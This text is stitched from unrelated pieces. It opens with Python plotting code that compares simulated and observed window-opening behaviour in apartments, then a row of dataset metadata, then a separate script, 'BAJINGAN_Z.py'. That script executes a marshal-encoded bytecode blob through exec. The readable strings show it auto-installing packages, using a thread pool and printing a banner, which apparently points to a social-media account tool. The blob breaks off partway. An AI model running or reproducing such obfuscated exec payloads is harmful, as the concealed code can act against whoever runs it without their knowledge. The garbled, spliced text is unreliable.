ax.xaxis.set_major_formatter(matplotlib.dates.DateFormatter('%H:%M'))
ax.legend(loc='upper center', bbox_to_anchor=(0.475, -0.2),frameon=False, ncol=3)
plt.show()
def plotBoxes(df,df2, labels=[],levels=[],title=None,colors=None, savingFolder="", extraName=""):
fig2= plt.figure(figsize=(16./2.54, 8/2.54))
fig2.subplots_adjust(left=0.1)
#gs2 = gridspec.GridSpec(1, 1)
#ax2 = fig2.add_subplot(gs2[0, :])
ax2 = fig2.add_axes([0.13, 0.355, .85, .55])
#plt.title(title, y=1.05)
bp = ax2.boxplot(df2.values-df.values, sym='-', vert=True, whis=1.5)#, linewidth=2.0,label=labels[index],alpha=0.4)
# Now fill the boxes with desired colors
boxColors = colors
bisColors = [a for a in colors for i in range(2)]
numBoxes = 6
medians = range(numBoxes)
meanValues=DataFrame(df2.values-df.values).mean(axis=0).values
meanAbsResiduals=DataFrame(abs(df2.values-df.values)).mean(axis=0).values
for i in range(numBoxes):
box = bp['boxes'][i]
boxY = []
boxX = []
for j in range(5):
boxX.append(box.get_xdata()[j])
boxY.append(box.get_ydata()[j])
boxCoords = zip(boxX,boxY)
boxPolygon = Polygon(boxCoords, facecolor=boxColors[i], alpha=0.1,zorder=1)
ax2.add_patch(boxPolygon)
# Now draw the median lines back over what we just filled in
med = bp['medians'][i]
medianX = []
medianY = []
for j in range(2):
medianX.append(med.get_xdata()[j])
medianY.append(med.get_ydata()[j])
plt.plot(medianX, medianY, boxColors[i],linewidth=2)
medians[i] = medianY[0]
# Finally, overplot the sample averages, with horizontal alignment
# in the center of each box
plt.plot([np.average(med.get_xdata())], meanValues[i],
color='None', marker='o', markeredgecolor=boxColors[i], markersize=7,zorder=0)
plt.plot([np.average(med.get_xdata())], meanValues[i],
color=boxColors[i], marker='o', markeredgecolor=boxColors[i], markersize=7,alpha=0.2,zorder=3)
plt.setp(bp['medians'][i], color=colors[i]) # DarkSlateGray
plt.setp(bp['boxes'][i], color='DarkSlateGray')
for i in range(len(bisColors)):
plt.setp(bp['whiskers'][i], color='DarkSlateGray')
plt.setp(bp['caps'][i], color='DarkSlateGray')
plt.setp(bp['fliers'], color='Gainsboro')
plt.setp(bp['whiskers'], linestyle='solid')
ax2.set_ylabel("Simulated-Observed WP profile")
# ax2.set_ylabel("Simulated-Observed WS")
ax2.yaxis.set_label_coords(-0.09, 0.5)
ax2.set_ylim(-0.02,0.02)
#ax2.set_yticks([0.2, 0.6, 0.8], minor=False)
ax2.yaxis.set_ticks_position('left')
ax2.xaxis.set_ticks_position('bottom')
#newLabels= ["ATR",'DAT $\leq$ 5'," 5 $\leq$ \nDAT\n $\leq$ 11", "11 $\leq$ \nDAT\n $\leq$ 14","14 $\leq$ \nDAT\n $\leq$ 18","DAT $\geq$ 18"]
xtickNames = plt.setp(ax2, xticklabels=labels)
plt.setp(xtickNames,rotation=30)#, fontsize=8
ax2.yaxis.grid(True,zorder=0, color="Gainsboro", ls="-")
ax2.xaxis.grid(False)
ax2.set_axisbelow(True)
title=str(np.char.replace(title," ", '_'))
title=str(np.char.replace(title,"Apartment", 'Ap'))
plt.savefig(savingFolder+title+'_BP.png',figure=fig2, format='png')
plt.savefig(savingFolder+title+'_BP.pdf',figure=fig2, format='pdf')
#plt.show()
def plotDiurnalandBoxes(df,df2, labels=[],levels=[],timeType='Standard Diurnal',dataType='MD',title=None,colors=None, savingFolder="", extraName=""):
print (levels)
if levels[1]== "B2E3" and levels[2]=='A03'and levels[3]=='Room_Kitchen':
return np.empty(6) * np.nan, str(levels)
else:
oldtitle=title
title=desmountTitle(title, extraName)
name=buildName(oldtitle, extraName)
if timeType!='Standard Diurnal':
title=timeType+' - '+ title
name=timeType+' - '+ name
if levels[0]!=None:
df=df.iloc[:,df.columns.get_level_values(0)==levels[0]]
df2=df2.iloc[:,df2.columns.get_level_values(0)==levels[0]]
if timeType!=None:
df=df.iloc[:,df.columns.get_level_values(1)==timeType]
df2=df2.iloc[:,df2.columns.get_level_values(1)==timeType]
if dataType!=None:
df=df.iloc[:,df.columns.get_level_values(2)==dataType]
df2=df2.iloc[:,df2.columns.get_level_values(2)==dataType]
if levels[1]!=None:
df=df.iloc[:,df.columns.get_level_values(3)==levels[1]]
df2=df2.iloc[:,df2.columns.get_level_values(3)==levels[1]]
if levels[2]!=None:
df=df.iloc[:,df.columns.get_level_values(4)==levels[2]]
df2=df2.iloc[:,df2.columns.get_level_values(4)==levels[2]]
if levels[3]!=None:
df=df.iloc[:,df.columns.get_level_values(5)==levels[3]]
df2=df2.iloc[:,df2.columns.get_level_values(5)==levels[3]]
if levels[4]!=None:
df=df.iloc[:,df.columns.get_level_values(6)==levels[4]]
df2=df2.iloc[:,df2.columns.get_level_values(6)==levels[4]]
print ("WE", df.columns)
print ('We', df2.columns)
fig = plt.figure(figsize=(16./2.54, 10/2.54))
fig.subplots_adjust(left=0.1)
# gs1 = gridspec.GridSpec(1, 1)
# ax = plt.subplot(gs1[0, :])
#ax = fig.add_axes([0.13, 0.1, .85, .8])
ax = fig.add_axes([0.13, 0.355, .85, .55])
for index,column in enumerate(df.columns.values):
if index!=10: ax.plot(df.index, df[column], colors[index], linewidth=2.0,label=labels[index],alpha=0.4)
for index,column in enumerate(df2.columns.values):
if index!=10: ax.plot(df.index, df2[column], colors[index], marker="x", linewidth=0.7,markevery=60,mfc='None', mec=colors[index],label=labels[index]+' Sim')
ax.set_ylabel("Proportion of window open")
ax.yaxis.set_label_coords(-0.09, 0.5)
ax.set_xlabel("Time of the day")
ticks = ax.get_xticks()
ax.set_ylim(0,1)
plt.title(title, y=1.05)
box = ax.get_position()
#ax.set_position([box.x0, box.y0 + box.height * 0.32,
# box.width, box.height * 0.68])
ax.xaxis.set_major_formatter(matplotlib.dates.DateFormatter('%H:%M'))
ax.legend(loc='upper center', bbox_to_anchor=(0.475, -0.2),frameon=False, ncol=3)
#ax.yaxis.grid(True,zorder=0, color="Gainsboro", ls="-")
#ax.xaxis.grid(False)
plt.savefig(savingFolder+name+'.pdf',figure=fig, format='pdf')
fig2= plt.figure(figsize=(16./2.54, 10/2.54))
fig2.subplots_adjust(left=0.1)
#gs2 = gridspec.GridSpec(1, 1)
#ax2 = fig2.add_subplot(gs2[0, :])
ax2 = fig2.add_axes([0.13, 0.355, .85, .55])
plt.title(title, y=1.05)
bp = ax2.boxplot(df2.values-df.values, sym='-', vert=True, whis=1.5)#, linewidth=2.0,label=labels[index],alpha=0.4)
# Now fill the boxes with desired colors
boxColors = colors
bisColors = [a for a in colors for i in range(2)]
numBoxes = 6
medians = range(numBoxes)
meanValues=DataFrame(df2.values-df.values).mean(axis=0).values
meanAbsResiduals=DataFrame(abs(df2.values-df.values)).mean(axis=0).values
for i in range(numBoxes):
box = bp['boxes'][i]
boxY = []
boxX = []
for j in range(5):
boxX.append(box.get_xdata()[j])
boxY.append(box.get_ydata()[j])
boxCoords = zip(boxX,boxY)
boxPolygon = Polygon(boxCoords, facecolor=boxColors[i], alpha=0.1,zorder=1)
ax2.add_patch(boxPolygon)
# Now draw the median lines back over what we just filled in
med = bp['medians'][i]
medianX = []
medianY = []
for j in range(2):
medianX.append(med.get_xdata()[j])
medianY.append(med.get_ydata()[j])
plt.plot(medianX, medianY, boxColors[i],linewidth=2)
medians[i] = medianY[0]
# Finally, overplot the sample averages, with horizontal alignment
# in the center of each box
plt.plot([np.average(med.get_xdata())], meanValues[i],
color='None', marker='o', markeredgecolor=boxColors[i], markersize=7,zorder=0)
plt.plot([np.average(med.get_xdata())], meanValues[i],
color=boxColors[i], marker='o', markeredgecolor=boxColors[i], markersize=7,alpha=0.2,zorder=3)
plt.setp(bp['medians'][i], color=colors[i]) # DarkSlateGray
plt.setp(bp['boxes'][i], color='DarkSlateGray')
for i in range(len(bisColors)):
plt.setp(bp['whiskers'][i], color='DarkSlateGray')
plt.setp(bp['caps'][i], color='DarkSlateGray')
plt.setp(bp['fliers'], color='Gainsboro')
plt.setp(bp['whiskers'], linestyle='solid')
ax2.set_ylabel("Simulated-Observed WP profile")
ax2.yaxis.set_label_coords(-0.09, 0.5)
ax2.set_ylim(-0.1,0.1)
#ax2.set_yticks([0.2, 0.6, 0.8], minor=False)
ax2.yaxis.set_ticks_position('left')
ax2.xaxis.set_ticks_position('bottom')
#newLabels= ["ATR",'DAT $\leq$ 5'," 5 $\leq$ \nDAT\n $\leq$ 11", "11 $\leq$ \nDAT\n $\leq$ 14","14 $\leq$ \nDAT\n $\leq$ 18","DAT $\geq$ 18"]
xtickNames = plt.setp(ax2, xticklabels=labels)
plt.setp(xtickNames,rotation=30)#, fontsize=8
ax2.yaxis.grid(True,zorder=0, color="Gainsboro", ls="-")
ax2.xaxis.grid(False)
ax2.set_axisbelow(True)
plt.savefig(savingFolder+title+'_BP.pdf',figure=fig2, format='pdf')
#plt.show()
return meanValues, str(levels), meanAbsResiduals
def plotDiurnalandBoxesBeta(df,df2, labels=[],levels=[],timeType='Standard Diurnal',dataType='MD',title=None,colors=None, savingFolder="", extraName=""):
print (levels)
if levels[1]== "B2E3" and levels[2]=='A03'and levels[3]=='Room_Kitchen':
return np.empty(6) * np.nan, str(levels)
else:
oldtitle=title
title=desmountTitle(title, extraName)
name=buildName(oldtitle, extraName)
if timeType!='Standard Diurnal':
title=timeType+' - '+ title
name=timeType+' - '+ name
if levels[0]!=None:
df=df.iloc[:,df.columns.get_level_values(0)==levels[0]]
df2=df2.iloc[:,df2.columns.get_level_values(0)==levels[0]]
if timeType!=None:
df=df.iloc[:,df.columns.get_level_values(1)==timeType]
df2=df2.iloc[:,df2.columns.get_level_values(1)==timeType]
if dataType!=None:
df=df.iloc[:,df.columns.get_level_values(2)==dataType]
df2=df2.iloc[:,df2.columns.get_level_values(2)==dataType]
if levels[1]!=None:
df=df.iloc[:,df.columns.get_level_values(3)==levels[1]]
df2=df2.iloc[:,df2.columns.get_level_values(3)==levels[1]]
if levels[2]!=None:
df=df.iloc[:,df.columns.get_level_values(4)==levels[2]]
df2=df2.iloc[:,df2.columns.get_level_values(4)==levels[2]]
if levels[3]!=None:
df=df.iloc[:,df.columns.get_level_values(5)==levels[3]]
df2=df2.iloc[:,df2.columns.get_level_values(5)==levels[3]]
if levels[4]!=None:
df=df.iloc[:,df.columns.get_level_values(6)==levels[4]]
df2=df2.iloc[:,df2.columns.get_level_values(6)==levels[4]]
fig = plt.figure(figsize=(16./2.54, 9/2.54))
fig.subplots_adjust(left=0.1)
# gs1 = gridspec.GridSpec(1, 1)
# ax = plt.subplot(gs1[0, :])
#ax = fig.add_axes([0.13, 0.1, .85, .8])
ax = fig.add_axes([0.13, 0.4, .85, .5])
for index,column in enumerate(df.columns.values):
if index!=10: ax.plot(df.index, df[column], colors[index], linewidth=2.0,label=labels[index],alpha=0.4)
for index,column in enumerate(df2.columns.values):
if index!=10: ax.plot(df.index, df2[column], colors[index], marker="x", linewidth=0.7,markevery=60,mfc='None', mec=colors[index],label=labels[index]+' Sim')
if timeType=='Standard Diurnal': ax.set_ylabel("SD - Aver. WS, "+str(title.split(", ")[1]))
if timeType=='Week End': ax.set_ylabel("WE - Aver. WS, "+str(title.split(", ")[1]))
if timeType=='Week': ax.set_ylabel("WD - Aver. WS, "+str(title.split(", ")[1]))
ax.yaxis.set_label_coords(-0.09, 0.5)
ax.set_xlabel("Time of the day")
ticks = ax.get_xticks()
ax.set_ylim(0,1)
#plt.title(title, y=1.05)
box = ax.get_position()
#ax.set_position([box.x0, box.y0 + box.height * 0.32,
# box.width, box.height * 0.68])
ax.xaxis.set_major_formatter(matplotlib.dates.DateFormatter('%H:%M'))
ax.legend(loc='upper center', bbox_to_anchor=(0.475, -0.25),frameon=False, ncol=3)
#ax.yaxis.grid(True,zorder=0, color="Gainsboro", ls="-")
#ax.xaxis.grid(False)
titleb=str(np.char.replace(title," ", ''))
titleb=str(np.char.replace(titleb,",", '_'))
plt.savefig(savingFolder+titleb+'.pdf',figure=fig, format='pdf')
fig2= plt.figure(figsize=(16./2.54, 9/2.54))
fig2.subplots_adjust(left=0.1)
#gs2 = gridspec.GridSpec(1, 1)
#ax2 = fig2.add_subplot(gs2[0, :])
ax2 = fig2.add_axes([0.13, 0.4, .85, .5])
#plt.title(title, y=1.05)
print('start')
print (df2.head(1))
print('break')
#print (df.head(1))
print('stop')
bp = ax2.boxplot(df2.values-df.values, sym='-', vert=True, whis=1.5)#, linewidth=2.0,label=labels[index],alpha=0.4)
# Now fill the boxes with desired colors
boxColors = colors
bisColors = [a for a in colors for i in range(2)]
numBoxes = 6
medians = range(numBoxes)
meanValues=DataFrame(df2.values-df.values).mean(axis=0).values
meanAbsResiduals=DataFrame(abs(df2.values-df.values)).mean(axis=0).values
for i in range(numBoxes):
box = bp['boxes'][i]
boxY = []
boxX = []
for j in range(5):
boxX.append(box.get_xdata()[j])
boxY.append(box.get_ydata()[j])
boxCoords = zip(boxX,boxY)
boxPolygon = Polygon(boxCoords, facecolor=boxColors[i], alpha=0.1,zorder=1)
ax2.add_patch(boxPolygon)
# Now draw the median lines back over what we just filled in
med = bp['medians'][i]
medianX = []
medianY = []
for j in range(2):
medianX.append(med.get_xdata()[j])
medianY.append(med.get_ydata()[j])
plt.plot(medianX, medianY, boxColors[i],linewidth=2)
medians[i] = medianY[0]
# Finally, overplot the sample averages, with horizontal alignment
# in the center of each box
plt.plot([np.average(med.get_xdata())], meanValues[i],
color='None', marker='o', markeredgecolor=boxColors[i], markersize=7,zorder=0)
plt.plot([np.average(med.get_xdata())], meanValues[i],
color=boxColors[i], marker='o', markeredgecolor=boxColors[i], markersize=7,alpha=0.2,zorder=3)
plt.setp(bp['medians'][i], color=colors[i]) # DarkSlateGray
plt.setp(bp['boxes'][i], color='DarkSlateGray')
for i in range(len(bisColors)):
plt.setp(bp['whiskers'][i], color='DarkSlateGray')
plt.setp(bp['caps'][i], color='DarkSlateGray')
plt.setp(bp['fliers'], color='Gainsboro')
plt.setp(bp['whiskers'], linestyle='solid')
if timeType=='Standard Diurnal': ax2.set_ylabel("SD - Sim.-Obs. WS, "+str(title.split(", ")[1]))
if timeType=='Week End': ax2.set_ylabel("WE - Sim.-Obs. WS, "+str(title.split(", ")[1]))
if timeType=='Week': ax2.set_ylabel("WD - Sim.-Obs. WS, "+str(title.split(", ")[1]))
ax2.set_ylabel("Sim.-Obs. WS, "+str(title.split(", ")[1]))
ax2.yaxis.set_label_coords(-0.09, 0.5)
ax2.set_ylim(-0.1,0.1)
#ax2.set_yticks([0.2, 0.6, 0.8], minor=False)
ax2.yaxis.set_ticks_position('left')
ax2.xaxis.set_ticks_position('bottom')
#newLabels= ["ATR",'DAT $\leq$ 5'," 5 $\leq$ \nDAT\n $\leq$ 11", "11 $\leq$ \nDAT\n $\leq$ 14","14 $\leq$ \nDAT\n $\leq$ 18","DAT $\geq$ 18"]
xtickNames = plt.setp(ax2, xticklabels=labels)
plt.setp(xtickNames,rotation=30)#, fontsize=8
ax2.yaxis.grid(True,zorder=0, color="Gainsboro", ls="-")
ax2.xaxis.grid(False)
ax2.set_axisbelow(True)
title=str(np.char.replace(title," ", ''))
title=str(np.char.replace(title,",", '_'))
#plt.show()
plt.savefig(savingFolder+title+'_BP.pdf',figure=fig2, format='pdf')
return meanValues, str(levels), meanAbsResiduals
def desmountTitle(title,startTitle):
newTitle=startTitle
for i, word in enumerate(title):
if i== len(title)-1: newTitle=newTitle+str(word)
else:
if i==0:
newTitle=startTitle+' - '
else:
newTitle=newTitle+str(word)+', '
return newTitle
def buildName(title,startTitle):
newTitle=startTitle
for i, word in enumerate(title):
if i== len(title)-1: newTitle=newTitle+str(word)
else:
if i==0:
newTitle=startTitle+'_'
else:
newTitle=newTitle+str(word)+'_'
return newTitle
if __name__ == '__main__':
print ("Start main")
recordFolder='D:/dc224615_Ddiss/Documento/Pictures/MCValidation/B2E1/'
recFolder='D:/EBC0018_PTJ_Volkswohnung_tos/HDF-Programming/pd4hdf/MarkovChain/MC4Windows/records/'
df1=pd.read_csv(recFolder+'diurnals/B2E1_20121_201212diurnals.csv', index_col=0, sep=';', header=[0,1,2,4,5,6,7],skiprows=[8], parse_dates=True,low_memory=False)
# df1=pd.read_csv(recFolder+'diurnals3/B2E1_20121_201212diurnals_MD.csv', index_col=0, sep=';', header=[0,1,2,4,5,6,7],skiprows=[8], parse_dates=True,low_memory=False)
df2=pd.read_csv(recFolder+'validationM3_B2E1/proSet_100_B2E1_CDPL.csv', index_col=0, sep=';', header=[0,1,2,4,5,6,7],skiprows=[8], parse_dates=True,low_memory=False)
roomsWP1 = ['Room_Kitchen','Room_Bath','Room_Living']
roomsWP = ['Room_Children','Room_Sleeping']
entrances = ["B2E1"]#,"B2E2","B2E3","B3E1","B3E2","B3E3"]
apartments = ["A01","A02","A03","A04","A05","A06","A07","A08","A09","A10"]
#apartmentsPlus = ["A01","A02","A03","A04","A05","A06","A07","A08","A09","A10",'-']
results=[]
indicis=[]
columns4Results=[]
for entrance in entrances:
for apartment in apartments:
for room in roomsWP1:
colors,markers,title,labels,keys = Select_ColorsAndMarkers(Level0 = None , Level2=entrance, Level3 = apartment,Level4 = room,Level5 = "WP1")
title,labels = english2English(title,labels)
keys = codifyL1(keys)
values,indice=plotDiurnalandBoxes(df1,df2,levels=keys,labels=labels,title=title,colors=colors,savingFolder=recordFolder,extraName='2012')
results.append(values)
indicis.append(indice)
for room in roomsWP:
print (entrance, apartment, room)
colors,markers,title,labels,keys = Select_ColorsAndMarkers(Level0 = None , Level2=entrance, Level3 = apartment,Level4 = room,Level5 = "WP")
title,labels = english2English(title,labels)
keys = codifyL1(keys)
values,indice=plotDiurnalandBoxes(df1,df2,levels=keys,labels=labels,title=title,colors=colors,savingFolder=recordFolder,extraName='2012')
results.append(values)
indicis.append(indice)
columns4Results=labels
print (results)
resultDF=DataFrame(results, index=indicis,columns=columns4Results)
resultDF.to_csv(recordFolder+"results.csv", ';')
print ("end main") | 55.379981 | 238 | 0.45802 | 9,292 | 119,510 | 5.834158 | 0.059836 | 0.038738 | 0.048145 | 0.061537 | 0.897124 | 0.886333 | 0.875154 | 0.870008 | 0.84564 | 0.830717 | 0 | 0.041321 | 0.367183 | 119,510 | 2,158 | 239 | 55.379981 | 0.675491 | 0.139311 | 0 | 0.83513 | 0 | 0 | 0.074672 | 0.002801 | 0 | 0 | 0 | 0 | 0 | 1 | 0.009512 | false | 0.001902 | 0.005073 | 0 | 0.103995 | 0.042486 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
c04397e35eab55c6b0a5b762c68b623c6e87ac4a | 63,548 | py | Python | BAJINGAN_Z.py | niazi911/fast | 61aecddb4db50ee9db62603ec65fafaa7414ef1f | [
"Apache-2.0"
] | null | null | null | BAJINGAN_Z.py | niazi911/fast | 61aecddb4db50ee9db62603ec65fafaa7414ef1f | [
"Apache-2.0"
] | null | null | null | BAJINGAN_Z.py | niazi911/fast | 61aecddb4db50ee9db62603ec65fafaa7414ef1f | [
"Apache-2.0"
] | null | null | null | #Compiled By Angga
#Facebook : https://www.facebook.com/PEMUDA.KALEUM
import marshal
exec(marshal.loads('c\x00\x00\x00\x00\x00\x00\x00\x00\x0c\x00\x00\x00@\x00\x00\x00sE\x03\x00\x00d\x00\x00d\x01\x00l\x00\x00Z\x00\x00y\x10\x00d\x00\x00d\x01\x00l\x01\x00Z\x01\x00Wn\x1e\x00\x04e\x02\x00k\n\x00r<\x00\x01\x01\x01e\x00\x00j\x03\x00d\x02\x00\x83\x01\x00\x01n\x01\x00Xy\x10\x00d\x00\x00d\x01\x00l\x04\x00Z\x04\x00Wn\x1e\x00\x04e\x02\x00k\n\x00rm\x00\x01\x01\x01e\x00\x00j\x03\x00d\x03\x00\x83\x01\x00\x01n\x01\x00Xd\x00\x00d\x01\x00l\x00\x00Z\x00\x00d\x00\x00d\x01\x00l\x05\x00Z\x05\x00d\x00\x00d\x01\x00l\x06\x00Z\x06\x00d\x00\x00d\x01\x00l\x07\x00Z\x07\x00d\x00\x00d\x01\x00l\x01\x00Z\x01\x00d\x00\x00d\x01\x00l\x08\x00Z\x08\x00d\x00\x00d\x01\x00l\t\x00Z\t\x00d\x00\x00d\x01\x00l\n\x00Z\n\x00d\x00\x00d\x04\x00l\x0b\x00m\x0c\x00Z\x0c\x00\x01d\x00\x00d\x05\x00l\x04\x00m\r\x00Z\x0e\x00\x01d\x00\x00d\x06\x00l\x0f\x00m\x0f\x00Z\x0f\x00\x01d\x00\x00d\x07\x00l\x0f\x00m\x10\x00Z\x10\x00\x01d\x08\x00a\x11\x00g\x00\x00Z\x12\x00g\x00\x00Z\x13\x00g\x00\x00Z\x14\x00e\x0f\x00j\x15\x00\x83\x00\x00Z\x16\x00e\x16\x00j\x17\x00Z\x18\x00d\t\x00d\n\x00d\x0b\x00d\x0c\x00d\r\x00d\x0e\x00d\x0f\x00d\x10\x00d\x11\x00d\x12\x00d\x13\x00d\x14\x00g\x0c\x00Z\x19\x00y0\x00e\x18\x00d\x08\x00k\x00\x00s\x80\x01e\x18\x00d\x15\x00k\x04\x00r\x8a\x01e\x1a\x00\x83\x00\x00\x01n\x00\x00e\x18\x00d\x16\x00\x18Z\x1b\x00Wn\x18\x00\x04e\x1c\x00k\n\x00r\xaf\x01\x01\x01\x01e\x1a\x00\x83\x00\x00\x01n\x01\x00Xe\x0f\x00j\x15\x00\x83\x00\x00Z\x1d\x00e\x1d\x00j\x1e\x00Z\x1f\x00e\x1d\x00j\x17\x00Z \x00e\x1d\x00j!\x00Z"\x00e\x19\x00e\x1b\x00\x19Z#\x00d\x17\x00\x84\x00\x00Z$\x00e\x10\x00j%\x00\x83\x00\x00Z&\x00e\n\x00j\'\x00e&\x00j(\x00\x83\x00\x00\x19Z)\x00d\x18\x00e)\x00e"\x00e#\x00e\x1f\x00f\x04\x00\x16Z*\x00d\x19\x00e"\x00e#\x00e\x1f\x00f\x03\x00\x16Z+\x00i\x0c\x00d\t\x00d\x1a\x006d\n\x00d\x1b\x006d\x0b\x00d\x1c\x006d\x0c\x00d\x1d\x006d\r\x00d\x1e\x006d\x0e\x00d\x1f\x006d\x0f\x00d \x006d\x10\x00d!\x006d\x11\x00d"\x006d\x12\x00d#\x006d\x13\x00d$\x006d\x14\x00d%\x006Z,\x00d&\x00\x84\x00\x00Z-\x00d\'\x00\x84\x00\x00Z.\x00d(\x00\x84\x00\x00Z/\x00d)\x00\x84\x00\x00Z0\x00d*\x00\x84\x00\x00Z1\x00d+\x00\x84\x00\x00Z2\x00d,\x00\x84\x00\x00Z3\x00d-\x00\x84\x00\x00Z4\x00d.\x00\x84\x00\x00Z5\x00d/\x00\x84\x00\x00Z6\x00d0\x00\x84\x00\x00Z7\x00d1\x00\x84\x00\x00Z8\x00d2\x00\x84\x00\x00Z9\x00d3\x00\x84\x00\x00Z:\x00e;\x00d4\x00k\x02\x00rA\x03e\x00\x00j\x03\x00d5\x00\x83\x01\x00\x01e\x00\x00j\x03\x00d6\x00\x83\x01\x00\x01e:\x00\x83\x00\x00\x01e.\x00\x83\x00\x00\x01n\x00\x00d\x01\x00S(7\x00\x00\x00i\xff\xff\xff\xffNs\x15\x00\x00\x00pip2 install requestss\x10\x00\x00\x00pip2 install bs4(\x01\x00\x00\x00t\n\x00\x00\x00ThreadPool(\x01\x00\x00\x00t\r\x00\x00\x00BeautifulSoup(\x01\x00\x00\x00t\x08\x00\x00\x00datetime(\x01\x00\x00\x00t\x04\x00\x00\x00datei\x00\x00\x00\x00t\x07\x00\x00\x00Januarit\x08\x00\x00\x00Februarit\x05\x00\x00\x00Marett\x05\x00\x00\x00Aprilt\x03\x00\x00\x00Meit\x04\x00\x00\x00Junit\x04\x00\x00\x00Julit\x07\x00\x00\x00Agustust\t\x00\x00\x00Septembert\x07\x00\x00\x00Oktobert\x08\x00\x00\x00Novembert\x08\x00\x00\x00Desemberi\x0c\x00\x00\x00i\x01\x00\x00\x00c\x01\x00\x00\x00\x02\x00\x00\x00\x03\x00\x00\x00C\x00\x00\x00sC\x00\x00\x00x<\x00|\x00\x00d\x01\x00\x17D]0\x00}\x01\x00t\x00\x00j\x01\x00j\x02\x00|\x01\x00\x83\x01\x00\x01t\x00\x00j\x01\x00j\x03\x00\x83\x00\x00\x01t\x04\x00j\x05\x00d\x02\x00\x83\x01\x00\x01q\x0b\x00Wd\x00\x00S(\x03\x00\x00\x00Ns\x01\x00\x00\x00\ng\x9a\x99\x99\x99\x99\x99\xa9?(\x06\x00\x00\x00t\x03\x00\x00\x00syst\x06\x00\x00\x00stdoutt\x05\x00\x00\x00writet\x05\x00\x00\x00flusht\x04\x00\x00\x00timet\x05\x00\x00\x00sleep(\x02\x00\x00\x00t\x01\x00\x00\x00zt\x01\x00\x00\x00e(\x00\x00\x00\x00(\x00\x00\x00\x00s\x10\x00\x00\x00<Ahmad_Riswanto>t\x05\x00\x00\x00jalan1\x00\x00\x00s\x08\x00\x00\x00\x00\x01\x11\x01\x10\x01\r\x01s\x0b\x00\x00\x00%s-%s-%s-%ss\x08\x00\x00\x00%s %s %st\x02\x00\x00\x0001t\x02\x00\x00\x0002t\x02\x00\x00\x0003t\x02\x00\x00\x0004t\x02\x00\x00\x0005t\x02\x00\x00\x0006t\x02\x00\x00\x0007t\x02\x00\x00\x0008t\x02\x00\x00\x0009t\x02\x00\x00\x0010t\x02\x00\x00\x0011t\x02\x00\x00\x0012c\x00\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00C\x00\x00\x00s\x16\x00\x00\x00t\x00\x00j\x01\x00d\x01\x00\x83\x01\x00\x01d\x02\x00GHd\x00\x00S(\x03\x00\x00\x00Nt\x05\x00\x00\x00clears\x85\x06\x00\x00\x1b[1;97m \n \x1b[1;95m\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x95\x97\xe2\x96\x91\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x95\x97\xe2\x96\x91\xe2\x96\x91\xe2\x96\x88\xe2\x96\x88\xe2\x95\x97\xe2\x96\x91\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x95\x97\xe2\x96\x91\xe2\x96\x91\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x95\x97\xe2\x96\x91\xe2\x96\x91\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x95\x97\xe2\x96\x91 \x1b[1;96m\xe2\x84\xa2 \x1b[1;95m\n \xe2\x96\x88\xe2\x96\x88\xe2\x95\x94\xe2\x95\x90\xe2\x95\x90\xe2\x96\x88\xe2\x96\x88\xe2\x95\x97\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x95\x97\xe2\x96\x91\xe2\x96\x88\xe2\x96\x88\xe2\x95\x91\xe2\x96\x88\xe2\x96\x88\xe2\x95\x94\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x9d\xe2\x96\x91\xe2\x96\x88\xe2\x96\x88\xe2\x95\x94\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x9d\xe2\x96\x91\xe2\x96\x88\xe2\x96\x88\xe2\x95\x94\xe2\x95\x90\xe2\x95\x90\xe2\x96\x88\xe2\x96\x88\xe2\x95\x97\n \xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x95\x91\xe2\x96\x88\xe2\x96\x88\xe2\x95\x94\xe2\x96\x88\xe2\x96\x88\xe2\x95\x97\xe2\x96\x88\xe2\x96\x88\xe2\x95\x91\xe2\x96\x88\xe2\x96\x88\xe2\x95\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x88\xe2\x96\x88\xe2\x95\x97\xe2\x96\x91\xe2\x96\x88\xe2\x96\x88\xe2\x95\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x88\xe2\x96\x88\xe2\x95\x97\xe2\x96\x91\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x95\x91\n \x1b[1;92m\xe2\x96\x88\xe2\x96\x88\xe2\x95\x94\xe2\x95\x90\xe2\x95\x90\xe2\x96\x88\xe2\x96\x88\xe2\x95\x91\xe2\x96\x88\xe2\x96\x88\xe2\x95\x91\xe2\x95\x9a\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x95\x91\xe2\x96\x88\xe2\x96\x88\xe2\x95\x91\xe2\x96\x91\xe2\x96\x91\xe2\x95\x9a\xe2\x96\x88\xe2\x96\x88\xe2\x95\x97\xe2\x96\x88\xe2\x96\x88\xe2\x95\x91\xe2\x96\x91\xe2\x96\x91\xe2\x95\x9a\xe2\x96\x88\xe2\x96\x88\xe2\x95\x97\xe2\x96\x88\xe2\x96\x88\xe2\x95\x94\xe2\x95\x90\xe2\x95\x90\xe2\x96\x88\xe2\x96\x88\xe2\x95\x91\n 